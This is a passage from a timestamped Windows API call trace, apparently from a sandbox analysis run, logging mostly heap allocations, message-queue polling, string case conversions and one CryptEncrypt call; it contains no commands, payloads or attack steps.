(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.397] CharLowerBuffW (in: lpsz="byte[5096]", cchLength=0xa | out: lpsz="byte[5096]") returned 0xa [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.398] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.398] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.398] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.398] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.399] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.399] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.399] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a4828*, pdwDataLen=0x8bef68*=0x13e7, dwBufLen=0x13e8 | out: pbData=0x34a4828*, pdwDataLen=0x8bef68*=0x13e8) returned 1 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0198.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0198.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.402] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.402] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.402] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.403] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.403] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.403] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.403] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.403] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.403] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.403] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.404] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.404] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.404] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.404] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.405] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.405] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.405] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.405] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.405] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.406] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.406] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 